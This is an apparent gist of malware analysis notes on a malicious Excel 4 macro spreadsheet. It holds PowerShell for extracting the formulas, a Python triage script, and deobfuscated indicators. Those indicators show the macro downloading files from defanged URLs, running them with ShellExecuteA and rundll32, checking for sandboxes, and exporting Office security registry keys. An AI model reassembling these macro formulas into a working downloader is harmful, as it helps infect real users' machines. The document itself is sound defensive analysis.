@mattifestation
Last active September 13, 2022 19:03
Excel 4 Macro Analysis Notes

Excel Spreadsheet Hash

VT Link: https://www.virustotal.com/gui/file/d9f00024784af858627a44731950ccb50fe3f37bf940ed47ae7b1ca35ac5ceff/detection

SHA256: D9F00024784AF858627A44731950CCB50FE3F37BF940ED47AE7B1CA35AC5CEFF

File Name: 2aKqjPrdo1-7192.xls

Analysis Code

The following PowerShell was used to extract the Excel 4 formula content (i.e., the executable macro code) from the workbook through the Excel COM object:

```powershell
$XLSPath = 'C:\Users\TestUser\Desktop\2aKqjPrdo1-7192.xls'

# Load the Excel COM class so that we can programmatically inspect the spreadsheet
$Excel = New-Object -ComObject 'Excel.Application'

# Open the suspicious spreadsheet
$WorkBook = $Excel.Workbooks.Open($XLSPath)

# See if there are any Excel 4 sheets. To support Excel 4 macros, there must be at least one dedicated macro sheet.
$WorkBook.Excel4MacroSheets

# There was one Excel 4 sheet. Pull it out by name - "Sheet2".
$Excel4MacroSheet = $WorkBook.Excel4MacroSheets.Item('Sheet2')

# Because the populated cells are spread out so much, get the row/column of the last populated cell.
# 11 is the xlCellTypeLastCell enum value for SpecialCells.
$LastCell = $Excel4MacroSheet.Cells.SpecialCells(11)

# Get the range of all populated cells (from A1 to the last used cell)
$AllUsedCells = $Excel4MacroSheet.Range($Excel4MacroSheet.Cells(1,1), $LastCell)

# We're going to save cells that have formula content here.
$CellArray = New-Object -TypeName 'System.Collections.Generic.List`1[Object]'

# Find the first cell that has a formula in it - i.e. executable Excel 4 macro content
$PopulatedCell = $AllUsedCells.Find('=*')

# Save the row/column of the first found cell so that we can break out of the find loop once the search wraps around.
$FirstRow = $PopulatedCell.Row
$FirstColumn = $PopulatedCell.Column

# Find all cells with formulas defined
do {
    $CellArray.Add($PopulatedCell)

    $PopulatedCell = $PopulatedCell.Find('=*')
} while (-not (($PopulatedCell.Row -eq $FirstRow) -and ($PopulatedCell.Column -eq $FirstColumn)))

# Extract and display the name of the first cell that will execute (a defined name starting with "Auto", e.g. Auto_Open).
$AutoOpenCell = $CellArray | Where-Object { $_.Name -and $_.Name.Name.StartsWith('Auto') }
$AutoOpenCell.Name.Name

# View the contents of all the defined formulas
$CellArray.Formula

$WorkBook.Close()
$Excel.Quit()
```

Relevant Deobfuscated Indicators (URIs sanitized)

```
="C:\Users\Public\hhg59VX.html"
="C:\Users\Public\hJKn4Y.reg"
="C:\Users\Public\yOjW.html"
="C:\Windows\system32\reg.exe"
="C:\Windows\system32\rundll32.exe"
="EXPORT HKCU\Software\Microsoft\Office\"
="hXXp://almakaaseb[.]com/wp-content/uploads/2020/05/wp-front.php"
="https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates"
="hXXps://neebank[.]com/wp-content/uploads/2020/05/wp-front.php"
="The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
=ALERT(IP28226)
=APP.MAXIMIZE()
=AQ14844&GET.WORKSPACE(2)&"\Excel\Security "&DJ57521&" /y"
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open",FQ16297,AV63127,0,5)
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open",IC4780,DB44363,0,5)
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,BI63752,GB7473,0,0)
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,CR50301,V56104,0,0)
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,GD29405,V56104,0,0)
=CLOSE(FALSE)
=FCLOSE(H41269)
=FILE.DELETE(DJ57521)
=FILES(GB7473)
=FILES(V56104)
=FOPEN(DJ57521)
=FPOS(H41269,215)
=FREAD(H41269,255)
=IF(GET.WINDOW(20),,GOTO(BR26512))
=IF(GET.WINDOW(23)<3,GOTO(BR26512),)
=IF(GET.WINDOW(7),GOTO(BR26512),)
=IF(GET.WORKSPACE(13)<770,GOTO(BR26512),)
=IF(GET.WORKSPACE(14)<390,GOTO(BR26512),)
=IF(GET.WORKSPACE(19),,GOTO(BR26512))
=IF(GET.WORKSPACE(31),GOTO(BR26512),)
=IF(GET.WORKSPACE(42),,GOTO(BR26512))
=IF(ISERROR(CD64101),GOTO(BR26512),)
=IF(ISERROR(IO65223),,RUN(EC47222))
=IF(ISNUMBER(SEARCH("0001",HP8602)),GOTO(BR26512),)
=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(BR26512))
=NEXT()
=V56104&",DllRegisterServer"
=WAIT(NOW()+"00:00:01")
=WHILE(ISERROR(FILES(DJ57521)))
```
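Once the formulas have been dumped as text (the `$CellArray.Formula` output above), the next analyst step is usually to group them by capability rather than read them one by one. The following Python is an added triage pass, not part of these notes or of any Excel tooling: it takes a list of `=...` formula strings, pulls out `CALL()` Win32 imports, `GET.WORKSPACE`/`GET.WINDOW` environment probes (the `IF(...,GOTO(exit))` sandbox-check pattern seen in this sample), XLM file I/O functions and path-like string literals, and reduces them to a one-line capability verdict. The sample input is a constructed subset of the indicators listed above; the function groupings and the verdict heuristic are this example's own.

```python
"""Triage of Excel 4.0 (XLM) formulas already extracted from a macro sheet.

Added example, not part of the original notes: groups formula text by what
it does so the capability of a sample can be read at a glance.
"""
import re
from collections import Counter

# Constructed sample input: a subset of the deobfuscated formulas in the notes above.
SAMPLE_FORMULAS = [
    '=IF(GET.WORKSPACE(19),,GOTO(BR26512))',
    '=IF(GET.WINDOW(7),GOTO(BR26512),)',
    '=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(BR26512))',
    '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,BI63752,GB7473,0,0)',
    '=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open",FQ16297,AV63127,0,5)',
    '=FOPEN(DJ57521)',
    '=FREAD(H41269,255)',
    '=FILE.DELETE(DJ57521)',
    '="C:\\Windows\\system32\\rundll32.exe"',
    '="C:\\Windows\\system32\\reg.exe"',
    '=V56104&",DllRegisterServer"',
    '=WAIT(NOW()+"00:00:01")',
    '=APP.MAXIMIZE()',
]

# Any XLM function call: a name followed by "("; names may contain dots (FILE.DELETE).
FUNC_RE = re.compile(r'\b([A-Z][A-Z0-9.]*)\(')
# CALL("dll","export",...): the bridge XLM uses to reach the Win32 API.
CALL_RE = re.compile(r'\bCALL\(\s*"([^"]+)"\s*,\s*"([^"]+)"')
# Environment probes that the sample combines with GOTO to bail out of sandboxes.
ENV_RE = re.compile(r'\bGET\.(?:WORKSPACE|WINDOW)\(\d+\)')
# Quoted string literals (dropped-file paths, LOLBin executables, URLs).
STR_RE = re.compile(r'"([^"]*)"')

# Example's own grouping of XLM file functions.
FILE_IO = {'FOPEN', 'FREAD', 'FWRITE', 'FCLOSE', 'FPOS', 'FILE.DELETE', 'FILES'}
PATH_SUFFIXES = ('.exe', '.dll', '.reg', '.html')


def triage(formulas):
    """Return a dict of findings for a list of '=...' formula strings."""
    findings = {
        'functions': Counter(),   # every XLM function seen, with counts
        'winapi_calls': [],       # (dll, export) pairs from CALL()
        'env_checks': [],         # GET.WORKSPACE / GET.WINDOW probes, in order
        'file_io': set(),         # XLM file functions used
        'paths': [],              # string literals that look like file paths
    }
    for f in formulas:
        # Blank out literals first so a quoted "open" or path is never read as code.
        code_only = STR_RE.sub('""', f)
        names = FUNC_RE.findall(code_only)
        findings['functions'].update(names)
        findings['winapi_calls'].extend(CALL_RE.findall(f))
        findings['env_checks'].extend(ENV_RE.findall(code_only))
        findings['file_io'].update(n for n in names if n in FILE_IO)
        for s in STR_RE.findall(f):
            if s.lower().endswith(PATH_SUFFIXES) or '\\' in s:
                findings['paths'].append(s)
    return findings


def verdict(findings):
    """Rough capability label: URLDownloadToFileA plus ShellExecuteA through CALL()
    is the download-and-execute pattern; environment probes mark it as evasive."""
    exports = {export.lower() for _, export in findings['winapi_calls']}
    downloads = 'urldownloadtofilea' in exports
    executes = 'shellexecutea' in exports
    evasive = bool(findings['env_checks'])
    if downloads and executes:
        return 'download-and-execute' + (' with sandbox checks' if evasive else '')
    if findings['winapi_calls']:
        return 'win32-api-call'
    return 'no direct API calls'


if __name__ == '__main__':
    result = triage(SAMPLE_FORMULAS)
    for key, value in result.items():
        print(f'{key}: {value}')
    print('verdict:', verdict(result))
```

Feeding it the full formula dump for this sample would additionally surface `reg.exe` with the `EXPORT HKCU\Software\Microsoft\Office\` string and the `FPOS`/`FREAD` pair under `file_io`, which together describe the macro-security registry check the notes show; the triage output is a reading aid, and the cell references still have to be resolved by hand (or in Excel, as above) to recover the concrete URLs and paths.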

References
